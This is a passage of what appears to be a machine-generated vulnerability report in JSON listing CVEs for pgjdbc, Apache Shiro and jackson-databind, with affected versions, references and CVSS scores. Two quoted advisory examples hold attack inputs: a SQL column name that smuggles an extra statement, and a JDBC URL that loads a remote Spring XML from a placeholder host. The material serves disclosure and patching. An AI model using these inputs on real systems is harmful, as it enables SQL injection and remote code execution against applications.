PGJDBC implementation of the `java.sql.ResultRow.refreshRow()` method is not performing escaping of column names so a malicious column name that contains a statement terminator, e.g. `;`, could lead to SQL injection. This could lead to executing additional SQL commands as the application's JDBC user.  User applications that do not invoke the `ResultSet.refreshRow()` method are not impacted.  User application that do invoke that method are impacted if the underlying database that they are querying via their JDBC application may be under the control of an attacker. The attack requires the attacker to trick the user into executing SQL against a table name who's column names would contain the malicious SQL and subsequently invoke the `refreshRow()` method on the ResultSet.  For example:  ```sql CREATE TABLE refresh_row_example (  id   int PRIMARY KEY,  \"1 FROM refresh_row_example; SELECT pg_sleep(10); SELECT * \" int ); ```  This example has a table with two columns. The name of the second column is crafted to contain a statement terminator followed by additional SQL. Invoking the `ResultSet.refreshRow()` on a ResultSet that queried this table, e.g. `SELECT * FROM refresh_row`, would cause the additional SQL commands such as the `SELECT pg_sleep(10)` invocation to be executed.  As the multi statement command would contain multiple results, it would not be possible for the attacker to get data directly out of this approach as the `ResultSet.refreshRow()` method would throw an exception. However, the attacker could execute any arbitrary SQL including inserting the data into another table that could then be read or any other DML / DDL statement.  Note that the application's JDBC user and the schema owner need not be the same. A JDBC application that executes as a privileged user querying database schemas owned by potentially malicious less-privileged users would be vulnerable. In that situation it may be possible for the malicious user to craft a schema that causes the application to execute commands as the privileged user.  ### Patches _Has the problem been patched? What versions should users upgrade to?_  Yes, versions 42.2.26, 42.3.7, and 42.4.1 have been released with a fix.  ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_  Check that you are not using the `ResultSet.refreshRow()` method.  If you are, ensure that the code that executes that method does not connect to a database that is controlled by an unauthenticated or malicious user. If your application only connects to its own database with a fixed schema with no DDL permissions, then you will not be affected by this vulnerability as it requires a maliciously crafted schema.   ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-31197, CVE-2022-31197"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.7"],"known_not_affected":["org.postgresql/postgresql@42.3.7"]},"references":[{"summary":"GitHub Advisory GHSA-r38f-c4h4-hqq2","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-r38f-c4h4-hqq2"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/10/msg00009.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6WHUADTZBBQLVHO4YG4XCWDGWBT4LRP"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTFE6SV33P5YYU2GNTQZQKQRVR3GYE4S"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-31197"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-31197"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.1,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.7"]}],"title":"CVE-2022-31197/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-21724"]}],"cve":"CVE-2022-21724","cwe":{"id":"665","name":"Improper Initialization"},"discovery_date":"2022-02-02T00:04:20","ids":[{"system_name":"CVE Record","text":"CVE-2022-21724"},{"system_name":"GitHub Advisory","text":"GHSA-v7wg-cpwc-24m4"},{"system_name":"Debian Advisory","text":"dsa-5196"},{"system_name":"NetApp Advisory","text":"ntap-20220311-0005"}],"notes":[{"audience":"developers","category":"other","text":"Exposure of Resource to Wrong Sphere","title":"Additional CWE: 668"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements in Output Used by a Downstream Component","title":"Additional CWE: 74"},{"category":"description","details":"Vulnerability Description","text":"pgjdbc Does Not Check Class Instantiation when providing Plugin Classes"},{"category":"details","details":"Vulnerability Details","text":"# pgjdbc Does Not Check Class Instantiation when providing Plugin Classes ### Impact  pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.  However, the driver did not verify if the class implements the expected interface before instantiating the class.  Here's an example attack using an out-of-the-box class from Spring Framework:  ``` DriverManager.getConnection(\"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml\"); ```  The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)  ## Related CVE(s) BIT-postgresql-jdbc-driver-2022-21724, CVE-2022-21724"}],"product_status":{"known_affected":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.2"],"known_not_affected":["org.postgresql/postgresql@42.3.2"]},"references":[{"summary":"GitHub Advisory GHSA-v7wg-cpwc-24m4","url":"https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21724"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-21724"},{"summary":"NetApp Advisory ntap-20220311-0005","url":"https://security.netapp.com/advisory/ntap-20220311-0005"},{"summary":"Debian Advisory dsa-5196","url":"https://www.debian.org/security/2022/dsa-5196"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.0,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.0,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.0,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.postgresql/postgresql@vers:maven/>=42.3.0|<42.3.2"]}],"title":"CVE-2022-21724/pkg:maven/org.postgresql/postgresql@42.3.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1957"]}],"cve":"CVE-2020-1957","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:53:18","ids":[{"system_name":"CVE Record","text":"CVE-2020-1957"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Authentication in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authentication in Apache Shiro Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.5.2"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r17f371fc89d34df2d0c8131473fbc68154290e1be238895648f5a1e6%40%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb3982edf8bc8fcaa7a308e25a12d294fb4aac1f1e9d4e14fda639e77@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc64fb2336683feff3580c3c3a8b28e80525077621089641f2f386b63@%3Ccommits.camel.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00014.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1957"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1957"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.1"]}],"title":"CVE-2020-1957/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-13933"]}],"cve":"CVE-2020-13933","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:54:23","ids":[{"system_name":"CVE Record","text":"CVE-2020-13933"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Authentication bypass in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Authentication bypass in Apache Shiro Apache Shiro before 1.6.0, when using Apache Shiro, a specially crafted HTTP request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.3"],"known_not_affected":["org.apache.shiro/shiro-core@1.6.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r18b45d560d76c4260813c802771cc9678aa651fb8340e09366bfa198@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4506cedc401d6b8de83787f8436aac83956e411d66848c84785db46d@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4c1e1249e9e1acb868db0c80728c13f448d07333da06a0f1603c0a33@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r539f87706094e79c5da0826030384373f0041068936912876856835f%40%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r575301804bfac87a064359cf4b4ae9d514f2d10db7d44120765f4129@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6ea0224c1971a91dc6ade1f22508119a9c3bd56cef656f0c44bbfabb@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70098e336d02047ce4d4e69293fe8d558cd68cde06f6430398959bc4@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70b907ccb306e9391145e2b10f56cc6914a245f91720a17a486c020a@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8097b81905f2a113ebdf925bcbc6d8c9d6863c807c9ee42e1e7c9293@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r852971e28f54cafa7d325bd7033115c67d613b112a2a1076817390ac@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9d93dfb5df016b1a71a808486bc8f9fbafebbdbc8533625f91253f1d@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ea6d8560d6354d41433ad006069904f0ed083527aa348b5999261a7@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb47d88af224e396ee34ffb88ee99fb6d04510de5722cf14b7137e6bc@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb5edf49cd1451475dbcf53826ba6ef1bb7872dd6493d6112eb0c2bad@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re25b8317b00a50272a7252c4552cf1a81a97984cc2111ef7728e48e0@%3Cdev.shiro.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/08/msg00002.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13933"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13933"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.3"]}],"title":"CVE-2020-13933/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-40664"]}],"cve":"CVE-2022-40664","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2022-10-12T12:00:16","ids":[{"system_name":"CVE Record","text":"CVE-2022-40664"},{"system_name":"Apache Advisory","text":"apache-shiro-1101-released"},{"system_name":"NetApp Advisory","text":"ntap-20221118-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro Authentication Bypass vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro Authentication Bypass vulnerability Apache Shiro before 1.10.0, Authentication Bypass Vulnerability in Shiro when forwarding or including via RequestDispatcher."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.10.0"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/12/1"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/12/2"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2022/10/13/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/loc2ktxng32xpy7lfwxto13k4lvnhjwg"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40664"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-40664"},{"summary":"NetApp Advisory ntap-20221118-0005","url":"https://security.netapp.com/advisory/ntap-20221118-0005"},{"summary":"Apache Advisory","url":"https://shiro.apache.org/blog/2022/10/10/2022/apache-shiro-1101-released.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.1"]}],"title":"CVE-2022-40664/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-32532"]}],"cve":"CVE-2022-32532","cwe":{"id":"285","name":"Improper Authorization"},"discovery_date":"2022-06-30T00:00:41","ids":[{"system_name":"CVE Record","text":"CVE-2022-32532"}],"notes":[{"audience":"developers","category":"other","text":"Incorrect Authorization","title":"Additional CWE: 863"},{"category":"description","details":"Vulnerability Description","text":"Improper Authorization in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authorization in Apache Shiro Apache Shiro before 1.9.1, A RegexRequestMatcher can be misconfigured to be bypassed on some servlet containers. Applications using RegExPatternMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.0"],"known_not_affected":["org.apache.shiro/shiro-core@1.9.1"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-32532"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-32532"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.9.0"]}],"title":"CVE-2022-32532/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11989"]}],"cve":"CVE-2020-11989","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-05-07T15:53:10","ids":[{"system_name":"CVE Record","text":"CVE-2020-11989"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Improper Authentication in Apache Shiro"},{"category":"details","details":"Vulnerability Details","text":"# Improper Authentication in Apache Shiro Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography, and session management. Apache Shiro before 1.5.3, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.2"],"known_not_affected":["org.apache.shiro/shiro-core@1.5.3"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2d2612c034ab21a3a19d2132d47d3e4aa70105008dd58af62b653040@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r408fe60bc8fdfd7c74135249d646d7abadb807ebf90f6fd2b014df21@%3Cdev.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675%40%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cdev.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r72815a124a119c450b86189767d06848e0d380b1795c6c511d54a675@%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rab1972d6b177f7b5c3dde9cfb0a40f03bca75f0eaf1d8311e5762cb3@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc8b39ea8b3ef71ddc1cd74ffc866546182683c8adecf19c263fe7ac0@%3Ccommits.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcf3d8041e1232201fe5d74fc612a193e435784d64002409b448b58fe@%3Cdev.geode.apache.org%3E"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11989"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11989"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.5.2"]}],"title":"CVE-2020-11989/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-41303"]}],"cve":"CVE-2021-41303","cwe":{"id":"287","name":"Improper Authentication"},"discovery_date":"2021-09-20T20:18:11","ids":[{"system_name":"CVE Record","text":"CVE-2021-41303"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220609-0001"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro vulnerable to a specially crafted HTTP request causing an authentication bypass"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro vulnerable to a specially crafted HTTP request causing an authentication bypass Apache Shiro before 1.8.0, when using Apache Shiro with Spring Boot, a specially crafted HTTP request may cause an authentication bypass. Users should update to Apache Shiro 1.8.0."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.7.1"],"known_not_affected":["org.apache.shiro/shiro-core@1.8.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raae98bb934e4bde304465896ea02d9798e257e486d04a42221e2c41b@%3Cuser.shiro.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re470be1ffea44bca28ccb0e67a4cf5d744e2d2b981d00fdbbf5abc13%40%3Cannounce.shiro.apache.org%3E"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41303"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41303"},{"summary":"NetApp Advisory ntap-20220609-0001","url":"https://security.netapp.com/advisory/ntap-20220609-0001"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.7.1"]}],"title":"CVE-2021-41303/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-46749"]}],"cve":"CVE-2023-46749","cwe":{"id":"22","name":"Improper Limitation of a Pathname to a Restricted Directory"},"discovery_date":"2024-01-15T12:30:19","ids":[{"system_name":"CVE Record","text":"CVE-2023-46749"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Shiro vulnerable to path traversal"},{"category":"details","details":"Vulnerability Details","text":"# Apache Shiro vulnerable to path traversal Apache Shiro before 1.130 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting   Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default)."}],"product_status":{"known_affected":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.12.0"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/mdv7ftz7k4488rzloxo2fb0p9shnp9wm"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46749"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46749"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.5,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":6.5,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":6.5,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.shiro/shiro-core@vers:maven/>=1.0.0-incubating|<=1.12.0"]}],"title":"CVE-2023-46749/pkg:maven/org.apache.shiro/shiro-core@1.2.4?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11619"]}],"cve":"CVE-2020-11619","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-05-15T18:58:44","ids":[{"system_name":"CVE Record","text":"CVE-2020-11619"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"NetApp Advisory","text":"ntap-20200511-0004"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory 